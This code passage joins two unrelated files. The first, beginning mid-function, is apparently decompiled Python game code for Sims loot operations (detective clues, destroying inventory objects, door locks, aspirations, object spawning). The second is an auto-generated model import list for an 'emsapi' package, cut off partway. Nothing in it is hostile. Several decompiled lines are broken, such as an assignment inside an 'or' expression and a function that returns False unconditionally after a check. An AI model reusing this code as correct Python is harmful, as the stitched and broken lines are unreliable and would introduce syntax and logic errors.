for action in self.fallback_actions:
action.apply_to_resolver(resolver)
return
if clue.notification is not None:
dialog = clue.notification(subject, resolver=resolver)
if dialog is not None:
dialog.show_dialog()
if clue.notebook_entry is not None:
subject.notebook_tracker.unlock_entry(clue.notebook_entry())
with telemetry_helper.begin_hook(loot_op_telemetry_writer, TELEMETRY_HOOK_DETECTIVE_CLUE, sim_info=subject) as (hook):
hook.write_guid(TELEMETRY_DETECTIVE_CLUE_FOUND, clue.guid64)
class NewCrimeLootOp(BaseTargetedLootOperation):
FACTORY_TUNABLES = {'career_reference': TunableReference(description='\n A reference to the detective career that keeps track of what crime\n is currently being tracked.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.CAREER)),
class_restrictions=('DetectiveCareer', ))}
def __init__(self, *args, career_reference, **kwargs):
(super().__init__)(*args, **kwargs)
self.career_reference = career_reference
@property
def loot_type(self):
return LootType.NEW_CRIME
def _apply_to_subject_and_target(self, subject, target, resolver):
career = subject.careers.get(self.career_reference.guid64)
if career is None:
logger.error('Failed to find career {} on Sim {}.', (self.career_reference),
subject, owner='bhill')
return
career.create_new_crime_data()
class BreakThroughLootOperation(BaseLootOperation):
FACTORY_TUNABLES = {'breakthrough_commodity':TunableReference(description='\n The commodity that tracks the breakthrough progress.\n ',
manager=services.get_instance_manager(sims4.resources.Types.STATISTIC)),
'time':TunableRealSecond(description='\n The amount of time, in real seconds, to show headline effect.\n ',
default=5)}
def __init__(self, *args, breakthrough_commodity, time, **kwargs):
(super().__init__)(*args, **kwargs)
self.breakthrough_commodity = breakthrough_commodity
self.time = time
def _apply_to_subject_and_target(self, subject, target, resolver):
if not subject.is_sim:
logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
return
progress = 0
commodity = subject.get_statistic((self.breakthrough_commodity), add=False)
if commodity is not None:
progress = int(100 * commodity.get_normalized_value())
op = BreakThroughMessage(sim_id=(subject.id), progress=progress, display_time=(self.time))
distributor.system.Distributor.instance().add_op(subject, op)
class DestroyObjectsFromInventorySource(enum.Int):
ALL_STORAGE = 0
VISIBLE_STORAGE = 1
HIDDEN_STORAGE = 2
class DestroyObjectsFromInventoryLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'description':"\n Destroy every object in the target's inventory that passes the\n tuned tests.\n ",
'object_tests':TunableTestSet(description='\n A list of tests to apply to all objects in the target inventory.\n Every object that passes these tests will be destroyed.\n '),
'object_source':TunableEnumEntry(description="\n The target's inventory storage types to search for objects to\n destroy.\n ",
tunable_type=DestroyObjectsFromInventorySource,
default=DestroyObjectsFromInventorySource.ALL_STORAGE),
'count':TunableVariant(description='\n The total number of objects to destroy. If multiple types of objects\n match the criteria test, an arbitrary set of objects, no more than\n the specified count, is destroyed.\n ',
number=TunableRange(tunable_type=int, default=1, minimum=0),
locked_args={'all': math.MAX_INT32},
default='all'),
'award_value':OptionalTunable(description="\n If necessary, define how an amount corresponding to the objects'\n value is given to Sims.\n ",
tunable=TunableTuple(recipient=TunableEnumEntry(description='\n Who to award funds to.\n ',
tunable_type=ParticipantTypeSingleSim,
default=(ParticipantTypeSingleSim.Actor),
invalid_enums=(
ParticipantTypeSingleSim.Invalid,)),
funds=TunableEnumEntry(description='\n Where to award funds to. This can go to household\n funds by default, or to business funds.\n ',
tunable_type=FundsSource,
default=(FundsSource.HOUSEHOLD)),
multiplier=TunableRange(description='\n Value multiplier for the award.\n ',
tunable_type=float,
default=1.0,
minimum=0.0),
tested_multipliers=TunableMultiplier.TunableFactory(description='\n Each multiplier that passes its test set will be applied to\n each award payment.\n ')))}
def __init__(self, *args, object_tests, object_source, count, award_value, **kwargs):
(super().__init__)(*args, **kwargs)
self.object_tests = object_tests
self.object_source = object_source
self.count = count
self.award_value = award_value
def _apply_to_subject_and_target(self, subject, target, resolver):
inventory = self._get_subject_inventory(subject)
if inventory is None:
return
objects_to_destroy = self._get_objects_and_award_values(inventory, resolver)
award_value = 0
pending_count = self.count
for obj, value in objects_to_destroy.items():
count = min(pending_count, obj.stack_count())
if inventory.try_destroy_object(obj, count=count, source=self, cause='Destroying specified objects from inventory loot op.'):
pending_count -= count
if self.award_value:
award_value += count * value
else:
logger.error('Error trying to destroy object {}.', obj)
if pending_count <= 0:
break
if award_value > 0:
recipient = resolver.get_participant(self.award_value.recipient).get_sim_instance()
tags = set()
if resolver.interaction is not None:
tags |= resolver.interaction.get_category_tags()
funds = get_funds_for_source((self.award_value.funds), sim=recipient)
funds.add(award_value, (Consts_pb2.TELEMETRY_OBJECT_SELL), recipient, tags=tags)
def get_simoleon_delta(self, interaction, target, context, **interaction_parameters):
if self.award_value is None:
return (
0, FundsSource.HOUSEHOLD)
resolver = (interaction.get_resolver)(target, context, **interaction_parameters)
subject = resolver.get_participant(self.subject)
inventory = self._get_subject_inventory(subject)
if inventory is None:
return (
0, FundsSource.HOUSEHOLD)
objects_values = self._get_objects_and_award_values(inventory, resolver)
award_value = 0
pending_count = self.count
for obj, value in objects_values.items():
count = min(pending_count, obj.stack_count())
pending_count -= count
award_value += count * value
if pending_count <= 0:
break
return (
award_value, self.award_value.funds)
def _get_subject_inventory(self, subject):
if subject.is_sim:
subject = subject.get_sim_instance()
inventory = getattr(subject, 'inventory_component', None)
if inventory is None:
logger.error('Subject {} does not have an inventory to check for objects to destroy.', subject)
return
return inventory
def _get_object_source(self, inventory):
if self.object_source == DestroyObjectsFromInventorySource.ALL_STORAGE:
obj_source = inventory
else:
if self.object_source == DestroyObjectsFromInventorySource.VISIBLE_STORAGE:
obj_source = inventory.visible_storage
else:
if self.object_source == DestroyObjectsFromInventorySource.HIDDEN_STORAGE:
obj_source = inventory.hidden_storage
else:
logger.error('Unknown object source type {} to check for objects to destroy.', self.object_source)
obj_source = ()
return obj_source
def _get_objects_and_award_values(self, inventory, resolver):
obj_source = self._get_object_source(inventory)
objects_to_destroy = {}
for obj in obj_source:
single_object_resolver = SingleObjectResolver(obj)
if not self.object_tests.run_tests(single_object_resolver):
continue
objects_to_destroy[obj] = self._get_object_value(obj, resolver) if self.award_value else 0
return objects_to_destroy
def _get_object_value(self, obj, resolver):
resolver = SingleActorAndObjectResolver(resolver.get_participant(self.award_value.recipient), obj, self)
multiplier = self.award_value.tested_multipliers.get_multiplier(resolver)
return int(obj.current_value * self.award_value.multiplier * multiplier)
class DestroyTargetObjectsLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'award_value': OptionalTunable(description="\n If necessary, define how an amount corresponding to the objects'\n value is given to Sims.\n ",
tunable=TunableTuple(recipient=TunableEnumEntry(description='\n Who to award funds to.\n ',
tunable_type=ParticipantTypeSingleSim,
default=(ParticipantTypeSingleSim.Actor),
invalid_enums=(
ParticipantTypeSingleSim.Invalid,)),
funds=TunableEnumEntry(description='\n Where to award funds to. This can go to household\n funds by default, or to business funds.\n ',
tunable_type=FundsSource,
default=(FundsSource.HOUSEHOLD)),
multiplier=TunableRange(description='\n Value multiplier for the award.\n ',
tunable_type=float,
default=1.0,
minimum=0.0),
tested_multipliers=TunableMultiplier.TunableFactory(description='\n Each multiplier that passes its test set will be applied to\n each award payment.\n ')))}
def __init__(self, *args, award_value, **kwargs):
(super().__init__)(*args, **kwargs)
self.award_value = award_value
def _apply_to_subject_and_target(self, subject, target, resolver):
household = self._get_subject_household(subject)
objects_to_destroy = self._get_objects_and_award_values(subject, resolver)
award_value = 0
for obj, value in objects_to_destroy.items():
if household is not None:
if obj.content_source == ContentSource.HOUSEHOLD_INVENTORY_PROXY:
original_household_funds = household.funds.money
removed_from_household_inventory = build_buy.remove_object_from_household_inventory(obj.id, household)
if removed_from_household_inventory:
award_value -= household.funds.money - original_household_funds
obj.destroy(source=self, cause='Destroying specified objects from loot op.')
if self.award_value:
award_value += value
else:
logger.error('Failed to destroy object {} ({})', obj, removed_from_household_inventory)
else:
continue
inventory = self._get_object_inventory(obj)
if inventory is not None and inventory.try_destroy_object(obj, source=self, cause='Destroying specified objects from inventory loot op.'):
if self.award_value:
award_value += value
else:
logger.error('Error trying to destroy object {}.', obj)
if award_value != 0:
tags = set()
if resolver.interaction is not None:
tags |= resolver.interaction.get_category_tags()
else:
funds = None
recipient = None
if self.award_value is not None:
recipient = resolver.get_participant(self.award_value.recipient).get_sim_instance()
funds = get_funds_for_source((self.award_value.funds), sim=recipient)
else:
if household is not None:
funds = household.funds
if funds is not None:
if award_value < 0:
funds.try_remove_amount((-award_value), (Consts_pb2.TELEMETRY_OBJECT_SELL), sim=recipient,
require_full_amount=False)
else:
funds.add(award_value, (Consts_pb2.TELEMETRY_OBJECT_SELL), sim=recipient, tags=tags)
def get_simoleon_delta(self, interaction, target, context, **interaction_parameters):
if self.award_value is None:
return (
0, FundsSource.HOUSEHOLD)
resolver = (interaction.get_resolver)(target, context, **interaction_parameters)
subject = resolver.get_participant(self.subject)
objects_values = self._get_objects_and_award_values(subject, resolver)
award_value = 0
for value in objects_values.values():
award_value += value
return (award_value, self.award_value.funds)
def _get_object_inventory(self, obj):
if obj.is_sim:
return
inventoryitem_component = getattr(obj, 'inventoryitem_component', None)
if inventoryitem_component is not None:
if inventoryitem_component.inventory_owner is not None:
return getattr(inventoryitem_component.inventory_owner, 'inventory_component', None)
def _get_subject_household(self, subject):
if subject.is_sim:
return subject.household
if subject.household_owner_id is not None:
return services.household_manager().get(subject.household_owner_id)
def _get_objects_and_award_values(self, subject, resolver):
objects_to_destroy = {}
objects_to_destroy[subject] = self._get_object_value(subject, resolver)
return objects_to_destroy
def _get_object_value(self, obj, resolver):
if self.award_value:
resolver = SingleActorAndObjectResolver(resolver.get_participant(self.award_value.recipient), obj, self)
multiplier = self.award_value.tested_multipliers.get_multiplier(resolver)
return int(obj.current_value * self.award_value.multiplier * multiplier)
return 0
class RemoveNotebookEntry(BaseLootOperation):
FACTORY_TUNABLES = {'subcategory_id':TunableEnumEntry(description='\n Subcategory type.\n ',
tunable_type=NotebookSubCategories,
default=NotebookSubCategories.INVALID,
invalid_enums=(
NotebookSubCategories.INVALID,)),
'removal_type':OptionalTunable(description='\n Option to select if we want to remove by subcategory (like remove\n all clues) or by a specific entry.\n ',
tunable=TunableList(description='\n List of entries to be removed.\n ',
tunable=TunableReference(description="\n The entry that will be removed from the player's notebook.\n ",
manager=(services.get_instance_manager(sims4.resources.Types.NOTEBOOK_ENTRY)),
pack_safe=True)),
disabled_name='all_entries',
enabled_name='remove_by_reference')}
def __init__(self, *args, subcategory_id, removal_type, **kwargs):
(super().__init__)(*args, **kwargs)
self.subcategory_id = subcategory_id
self.removal_type = removal_type
def _apply_to_subject_and_target(self, subject, target, resolver):
if not subject.is_sim:
logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
return
elif subject.notebook_tracker is None:
logger.warn("Trying to remove a notebook entry from {}, but they don't have a notebook. LOD issue?", subject)
return
if self.removal_type is None:
subject.notebook_tracker.remove_entries_by_subcategory(self.subcategory_id)
else:
for entry in self.removal_type:
subject.notebook_tracker.remove_entry_by_reference(self.subcategory_id, entry)
class IncrementCommunityChallengeCount(BaseLootOperation):
FACTORY_TUNABLES = {'count': Tunable(description='\n The number to increment the community count by.\n ',
tunable_type=int,
default=1)}
def __init__(self, *args, count, **kwargs):
(super().__init__)(*args, **kwargs)
self._count = count
def _apply_to_subject_and_target(self, subject, target, resolver):
msg = UI_pb2.IncrementCommunityCollectableCount()
msg_type = DistributorOps_pb2.Operation.MSG_INCREMENT_COMMUNITY_COLLECTABLE_COUNT
msg.count = self._count
distributor = Distributor.instance()
distributor.add_op_with_no_owner(GenericProtocolBufferOp(msg_type, msg))
def _validate_lock_target(loot, target):
if not target.has_locking_component():
logger.error('Target {} is not locked out by the loot {}.', target, loot, owner='mkartika')
return False
return True
def _validate_lock_subject_and_target(loot, subject, target):
if not subject.is_sim:
logger.error('Subject {} is not a Sim for the loot {}.', subject, loot, owner='mkartika')
return False
else:
return _validate_lock_target(loot, target) or False
return True
class LockDoor(BaseTargetedLootOperation):
@staticmethod
def _verify_tunable_callback(instance_class, tunable_name, source, value):
if not value.replace_same_lock_type:
if value.lock_data.factory is not LockAllWithSimIdExceptionData:
logger.error('Lock Data {} is tuned to not replace same lock type. This is not supported.', (value.lock_data.factory), owner='nsavalani')
FACTORY_TUNABLES = {'lock_data':TunableVariant(lock_all_with_simid_exception=LockAllWithSimIdExceptionData.TunableFactory(),
lock_all_with_situation_job_exception=LockAllWithSituationJobExceptionData.TunableFactory(),
lock_all_with_genus_exception=LockAllWithGenusException.TunableFactory(),
lock_ranked_statistic=LockRankedStatisticData.TunableFactory(),
default='lock_all_with_simid_exception'),
'replace_same_lock_type':Tunable(description='\n If True, it will replace the same type of lock data in the locking\n component, otherwise it will update the existing data.\n ',
tunable_type=bool,
default=True),
'clear_existing_locks':TunableEnumEntry(description='\n Which locks should be cleared before adding the new lock data.\n ',
tunable_type=ClearLock,
default=ClearLock.CLEAR_ALL),
'verify_tunable_callback':_verify_tunable_callback}
def __init__(self, *args, lock_data, replace_same_lock_type, clear_existing_locks, **kwargs):
(super().__init__)(*args, **kwargs)
self.lock_data = lock_data
self.replace_same_lock_type = replace_same_lock_type
self.clear_existing_locks = clear_existing_locks
def _apply_to_subject_and_target(self, subject, target, resolver):
if not _validate_lock_subject_and_target(self, subject, target):
return
lock_data = self.lock_data()
lock_data.setup_data(subject, target, resolver)
target.add_lock_data(lock_data, replace_same_lock_type=(self.replace_same_lock_type),
clear_existing_locks=(self.clear_existing_locks))
@TunableFactory.factory_option
def target_participant_type_options(description='The object to lock.', **kwargs):
return (BaseLootOperation.get_participant_tunable)('target_participant_type', description=description,
default_participant=ParticipantType.Object, **kwargs)
class UnlockDoor(BaseTargetedLootOperation):
FACTORY_TUNABLES = {'unlock_type': OptionalTunable(description='\n The type of the lock we want to remove, by default should be everything.\n ',
tunable=TunableEnumEntry(tunable_type=LockType,
default=(LockType.LOCK_ALL_WITH_SIMID_EXCEPTION)),
disabled_name='unlock_every_type')}
def __init__(self, *args, unlock_type, **kwargs):
(super().__init__)(*args, **kwargs)
self.unlock_type = unlock_type
def _apply_to_subject_and_target(self, subject, target, resolver):
if not _validate_lock_target(self, target):
return
target.remove_locks(lock_type=(self.unlock_type), lock_priority=(LockPriority.PLAYER_LOCK))
@TunableFactory.factory_option
def target_participant_type_options(description='The object to unlock.', **kwargs):
return (BaseLootOperation.get_participant_tunable)('target_participant_type', description=description,
default_participant=ParticipantType.Object, **kwargs)
class UnlockHiddenAspirationTrack(BaseLootOperation):
FACTORY_TUNABLES = {'aspiration_track': TunableReference(description='\n The Hidden Aspiration Track to unlock so that is can be selected during gameplay.',
manager=(services.get_instance_manager(sims4.resources.Types.ASPIRATION_TRACK)))}
def __init__(self, *args, aspiration_track, **kwargs):
(super().__init__)(*args, **kwargs)
self._aspiration_track = aspiration_track
def _apply_to_subject_and_target(self, subject, target, resolver):
if not subject.is_sim:
logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
return
aspiration_tracker = subject.sim_info.aspiration_tracker
if aspiration_tracker is None:
logger.error('Attempting to unlock a hidden aspiration for NPC {} in loot {}', self.subject, self)
return
aspiration_tracker.unlock_hidden_aspiration_track(self._aspiration_track)
class SetPrimaryAspirationTrack(BaseLootOperation):
FACTORY_TUNABLES = {'aspiration_track': TunableReference(description='\n The Aspiration Track to set as primary',
manager=(services.get_instance_manager(sims4.resources.Types.ASPIRATION_TRACK)))}
def __init__(self, *args, aspiration_track, **kwargs):
(super().__init__)(*args, **kwargs)
self._aspiration_track = aspiration_track
def _apply_to_subject_and_target(self, subject, target, resolver):
if not subject.is_sim:
logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
return
subject.sim_info.primary_aspiration = self._aspiration_track
class ResetAspiration(BaseTargetedLootOperation):
FACTORY_TUNABLES = {'aspiration': TunableReference(description='\n The aspiration that we want to reset.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.ASPIRATION)))}
def __init__(self, *args, aspiration, **kwargs):
(super().__init__)(*args, **kwargs)
self.aspiration = aspiration
def _apply_to_subject_and_target(self, subject, target, resolver):
if not subject.is_sim:
logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
return
aspiration_tracker = subject.aspiration_tracker
if aspiration_tracker is None:
return
aspiration_tracker.reset_milestone(self.aspiration)
class SummonNPC(BaseLootOperation):
FACTORY_TUNABLES = {'summoning_purpose': TunableEnumEntry(description='\n The purpose that is used to summon the NPC to the lot. Defined\n in venue tuning.\n ',
tunable_type=(venues.venue_constants.NPCSummoningPurpose),
default=(venues.venue_constants.NPCSummoningPurpose.DEFAULT))}
def __init__(self, *args, summoning_purpose, **kwargs):
(super().__init__)(*args, **kwargs)
self.summoning_purpose = summoning_purpose
@property
def target_participant_type(self):
return ParticipantType.TargetSim
def _apply_to_subject_and_target(self, subject, target, resolver):
if not target.is_sim:
logger.error('target {} is not a Sim for the loot {}.', target, self, owner='cjiang')
return False
services.current_zone().venue_service.active_venue.summon_npcs((target,), self.summoning_purpose)
class TravelToTargetSim(BaseLootOperation):
@property
def target_participant_type(self):
return ParticipantType.TargetSim
def _apply_to_subject_and_target(self, subject, target, resolver):
if not subject.is_sim:
logger.error('subject {} is not a Sim for the loot {}.', subject, self, owner='cjiang')
return False
else:
target.is_sim or logger.error('target {} is not a Sim for the loot {}.', target, self, owner='cjiang')
return False
if services.get_persistence_service().is_save_locked():
return
travel_info = TravelSimsToZone()
travel_info.zone_id = target.household.home_zone_id
travel_info.sim_ids.append(subject.id)
distributor.system.Distributor.instance().add_event(Consts_pb2.MSG_TRAVEL_SIMS_TO_ZONE, travel_info)
services.game_clock_service().set_clock_speed(ClockSpeedMode.PAUSED)
class SlotObjects(BaseTargetedLootOperation):
FACTORY_TUNABLES = {'slot_strategy': SlotStrategyVariant(description='\n The slot strategy we want to use to place objects from the transfer\n source into slots on the target.\n ')}
def __init__(self, *args, slot_strategy, **kwargs):
(super().__init__)(*args, **kwargs)
self.slot_strategy = slot_strategy
def _apply_to_subject_and_target(self, subject, target, resolver):
slot_strategy = self.slot_strategy(resolver)
if not slot_strategy.slot_objects():
logger.warn('Failed to slot objects. ')
class ForceSpawnObjects(BaseTargetedLootOperation):
def _apply_to_subject_and_target(self, subject, target, resolver):
if target.spawner_component is None:
logger.error('Target {} does not have a spawner component.', target, owner='amwu')
return
for data in target.spawner_component.spawner_data:
spawn_type = data.spawner_option.spawn_type
if spawn_type == SpawnerType.SLOT:
empty_slot_count = 0
for slot in target.get_runtime_slots_gen():
gardening_component = target.get_component(types.GARDENING_COMPONENT)
spawn_prohibited = gardening_component is not None and gardening_component.is_prohibited_spawn_slot(slot.slot_name_hash, target)
if slot.empty:
spawn_prohibited or empty_slot_count += 1
target.force_spawn_object(spawn_type=spawn_type, create_slot_obj_count=empty_slot_count)
else:
target.force_spawn_object(spawn_type=spawn_type)
class DoNothingLootOp(BaseLootOperation):
def _apply_to_subject_and_target(self, subject, target, resolver):
pass |
<filename>emsapi/models/__init__.py
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
try:
from .adi_ems_web_api_v2_model_analytic_analytic_id_py3 import AdiEmsWebApiV2ModelAnalyticAnalyticId
from .adi_ems_web_api_v2_dto_analytic_info_py3 import AdiEmsWebApiV2DtoAnalyticInfo
from .adi_ems_web_api_model_error_py3 import AdiEmsWebApiModelError
from .adi_ems_web_api_v2_dto_analytic_group_py3 import AdiEmsWebApiV2DtoAnalyticGroup
from .adi_ems_web_api_v2_dto_analytic_group_contents_py3 import AdiEmsWebApiV2DtoAnalyticGroupContents
from .adi_ems_web_api_v2_model_analytic_analytic_select_py3 import AdiEmsWebApiV2ModelAnalyticAnalyticSelect
from .adi_ems_web_api_v2_model_analytic_offset_type_py3 import AdiEmsWebApiV2ModelAnalyticOffsetType
from .adi_ems_web_api_v2_model_analytic_query_py3 import AdiEmsWebApiV2ModelAnalyticQuery
from .adi_ems_web_api_v2_model_analytic_analytic_result_py3 import AdiEmsWebApiV2ModelAnalyticAnalyticResult
from .adi_ems_web_api_v2_model_analytic_query_result_py3 import AdiEmsWebApiV2ModelAnalyticQueryResult
from .adi_ems_web_api_v2_dto_metadata_item_py3 import AdiEmsWebApiV2DtoMetadataItem
from .adi_ems_web_api_v2_dto_metadata_py3 import AdiEmsWebApiV2DtoMetadata
from .adi_ems_web_api_core_dto_data_range_py3 import AdiEmsWebApiCoreDtoDataRange
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_item_py3 import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetItem
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_py3 import AdiEmsWebApiV2DtoAnalyticSetAnalyticSet
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_group_py3 import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetGroup
from .adi_ems_web_api_v2_dto_asset_fleet_py3 import AdiEmsWebApiV2DtoAssetFleet
from .adi_ems_web_api_v2_dto_asset_aircraft_py3 import AdiEmsWebApiV2DtoAssetAircraft
from .adi_ems_web_api_v2_dto_asset_flight_phase_py3 import AdiEmsWebApiV2DtoAssetFlightPhase
from .adi_ems_web_api_v2_dto_asset_airport_py3 import AdiEmsWebApiV2DtoAssetAirport
from .adi_ems_web_api_v2_dto_schema_primary_key_field_py3 import AdiEmsWebApiV2DtoSchemaPrimaryKeyField
from .adi_ems_web_api_v2_dto_schema_database_py3 import AdiEmsWebApiV2DtoSchemaDatabase
from .adi_ems_web_api_v2_dto_schema_database_group_py3 import AdiEmsWebApiV2DtoSchemaDatabaseGroup
from .adi_ems_web_api_v2_dto_schema_field_py3 import AdiEmsWebApiV2DtoSchemaField
from .adi_ems_web_api_v2_dto_schema_field_group_py3 import AdiEmsWebApiV2DtoSchemaFieldGroup
from .adi_ems_web_api_v2_dto_schema_select_column_py3 import AdiEmsWebApiV2DtoSchemaSelectColumn
from .adi_ems_web_api_v2_dto_schema_group_by_column_py3 import AdiEmsWebApiV2DtoSchemaGroupByColumn
from .adi_ems_web_api_v2_dto_schema_order_by_column_py3 import AdiEmsWebApiV2DtoSchemaOrderByColumn
from .adi_ems_web_api_v2_dto_schema_filter_argument_py3 import AdiEmsWebApiV2DtoSchemaFilterArgument
from .adi_ems_web_api_v2_dto_schema_filter_py3 import AdiEmsWebApiV2DtoSchemaFilter
from .adi_ems_web_api_v2_dto_schema_query_py3 import AdiEmsWebApiV2DtoSchemaQuery
from .adi_ems_web_api_v2_dto_schema_query_result_header_py3 import AdiEmsWebApiV2DtoSchemaQueryResultHeader
from .adi_ems_web_api_v2_dto_schema_query_result_py3 import AdiEmsWebApiV2DtoSchemaQueryResult
from .adi_ems_web_api_v2_dto_schema_async_query_info_py3 import AdiEmsWebApiV2DtoSchemaAsyncQueryInfo
from .adi_ems_web_api_v2_dto_schema_async_query_data_py3 import AdiEmsWebApiV2DtoSchemaAsyncQueryData
from .adi_ems_web_api_v2_dto_schema_column_py3 import AdiEmsWebApiV2DtoSchemaColumn
from .adi_ems_web_api_v2_dto_schema_create_py3 import AdiEmsWebApiV2DtoSchemaCreate
from .adi_ems_web_api_v2_dto_schema_create_result_py3 import AdiEmsWebApiV2DtoSchemaCreateResult
from .adi_ems_web_api_v2_dto_schema_update_py3 import AdiEmsWebApiV2DtoSchemaUpdate
from .adi_ems_web_api_v2_dto_schema_update_result_py3 import AdiEmsWebApiV2DtoSchemaUpdateResult
from .adi_ems_web_api_v2_dto_schema_delete_py3 import AdiEmsWebApiV2DtoSchemaDelete
from .adi_ems_web_api_v2_dto_schema_delete_result_py3 import AdiEmsWebApiV2DtoSchemaDeleteResult
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_value_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResultValue
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_comment_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResultComment
from .adi_ems_web_api_v2_dto_ems_profile_profile_results_event_record_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_ems_profile_profile_results_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResults
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile_py3 import AdiEmsWebApiV2DtoEmsProfileEmsProfile
from .adi_ems_web_api_v2_dto_ems_profile_glossary_item_py3 import AdiEmsWebApiV2DtoEmsProfileGlossaryItem
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile_glossary_py3 import AdiEmsWebApiV2DtoEmsProfileEmsProfileGlossary
from .adi_ems_web_data_model_ems_system_py3 import AdiEmsWebDataModelEmsSystem
from .adi_ems_web_api_v2_dto_navigation_navigation_airport_py3 import AdiEmsWebApiV2DtoNavigationNavigationAirport
from .adi_ems_web_api_v2_dto_navigation_navigation_runway_py3 import AdiEmsWebApiV2DtoNavigationNavigationRunway
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_py3 import AdiEmsWebApiV2DtoNavigationNavigationProcedure
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment_navaid_py3 import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegmentNavaid
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment_py3 import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegment
from .adi_ems_web_api_v2_dto_navigation_navigation_waypoint_py3 import AdiEmsWebApiV2DtoNavigationNavigationWaypoint
from .adi_ems_web_api_v2_dto_navigation_navigation_navaid_py3 import AdiEmsWebApiV2DtoNavigationNavigationNavaid
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_item_py3 import AdiEmsWebApiV2DtoParameterSetParameterSetItem
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_py3 import AdiEmsWebApiV2DtoParameterSetParameterSet
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_group_py3 import AdiEmsWebApiV2DtoParameterSetParameterSetGroup
from .adi_ems_web_api_v2_dto_profile_profile_result_value_py3 import AdiEmsWebApiV2DtoProfileProfileResultValue
from .adi_ems_web_api_v2_dto_profile_profile_result_comment_py3 import AdiEmsWebApiV2DtoProfileProfileResultComment
from .adi_ems_web_api_v2_dto_profile_profile_results_event_record_py3 import AdiEmsWebApiV2DtoProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_profile_processing_information_py3 import AdiEmsWebApiV2DtoProfileProcessingInformation
from .adi_ems_web_api_v2_dto_profile_profile_results_py3 import AdiEmsWebApiV2DtoProfileProfileResults
from .adi_ems_web_api_v2_dto_profile_profile_py3 import AdiEmsWebApiV2DtoProfileProfile
from .adi_ems_web_api_v2_dto_profile_profile_group_py3 import AdiEmsWebApiV2DtoProfileProfileGroup
from .adi_ems_web_api_v2_dto_profile_glossary_item_py3 import AdiEmsWebApiV2DtoProfileGlossaryItem
from .adi_ems_web_api_v2_dto_profile_profile_glossary_py3 import AdiEmsWebApiV2DtoProfileProfileGlossary
from .adi_ems_web_api_v2_dto_profile_event_py3 import AdiEmsWebApiV2DtoProfileEvent
from .adi_ems_web_api_v2_model_tableau_trusted_py3 import AdiEmsWebApiV2ModelTableauTrusted
from .adi_ems_web_api_v2_model_tableau_tableau_server_py3 import AdiEmsWebApiV2ModelTableauTableauServer
from .adi_ems_web_shared_tableau_rest_site_py3 import AdiEmsWebSharedTableauRestSite
from .adi_ems_web_shared_tableau_rest_project_py3 import AdiEmsWebSharedTableauRestProject
from .adi_ems_web_shared_tableau_rest_user_py3 import AdiEmsWebSharedTableauRestUser
from .adi_ems_web_shared_tableau_rest_tag_py3 import AdiEmsWebSharedTableauRestTag
from .adi_ems_web_shared_tableau_rest_tags_py3 import AdiEmsWebSharedTableauRestTags
from .adi_ems_web_shared_tableau_rest_view_py3 import AdiEmsWebSharedTableauRestView
from .adi_ems_web_shared_tableau_rest_views_py3 import AdiEmsWebSharedTableauRestViews
from .adi_ems_web_shared_tableau_rest_workbook_py3 import AdiEmsWebSharedTableauRestWorkbook
from .adi_ems_web_api_v2_dto_trajectory_value_py3 import AdiEmsWebApiV2DtoTrajectoryValue
from .adi_ems_web_api_v2_dto_trajectory_value_array_py3 import AdiEmsWebApiV2DtoTrajectoryValueArray
from .adi_ems_web_api_v2_dto_trajectory_configuration_py3 import AdiEmsWebApiV2DtoTrajectoryConfiguration
from .adi_ems_web_api_v2_dto_upload_upload_request_py3 import AdiEmsWebApiV2DtoUploadUploadRequest
from .adi_ems_web_api_v2_dto_upload_upload_parameters_py3 import AdiEmsWebApiV2DtoUploadUploadParameters
from .adi_ems_web_api_v2_dto_upload_upload_result_py3 import AdiEmsWebApiV2DtoUploadUploadResult
from .adi_ems_web_api_v2_dto_upload_upload_status_py3 import AdiEmsWebApiV2DtoUploadUploadStatus
from .adi_ems_web_api_v2_dto_upload_upload_record_py3 import AdiEmsWebApiV2DtoUploadUploadRecord
from .adi_ems_web_api_v2_dto_upload_upload_processing_flight_status_py3 import AdiEmsWebApiV2DtoUploadUploadProcessingFlightStatus
from .adi_ems_web_api_v2_dto_upload_upload_processing_status_py3 import AdiEmsWebApiV2DtoUploadUploadProcessingStatus
from .adi_ems_web_api_v2_dto_upload_bucket_py3 import AdiEmsWebApiV2DtoUploadBucket
from .adi_ems_web_api_v2_dto_weather_taf_taf_parse_options_py3 import AdiEmsWebApiV2DtoWeatherTafTafParseOptions
from .adi_ems_web_api_v2_dto_weather_cloud_condition_py3 import AdiEmsWebApiV2DtoWeatherCloudCondition
from .adi_ems_web_api_v2_dto_weather_taf_icing_condition_py3 import AdiEmsWebApiV2DtoWeatherTafIcingCondition
from .adi_ems_web_api_v2_dto_weather_taf_turbulence_condition_py3 import AdiEmsWebApiV2DtoWeatherTafTurbulenceCondition
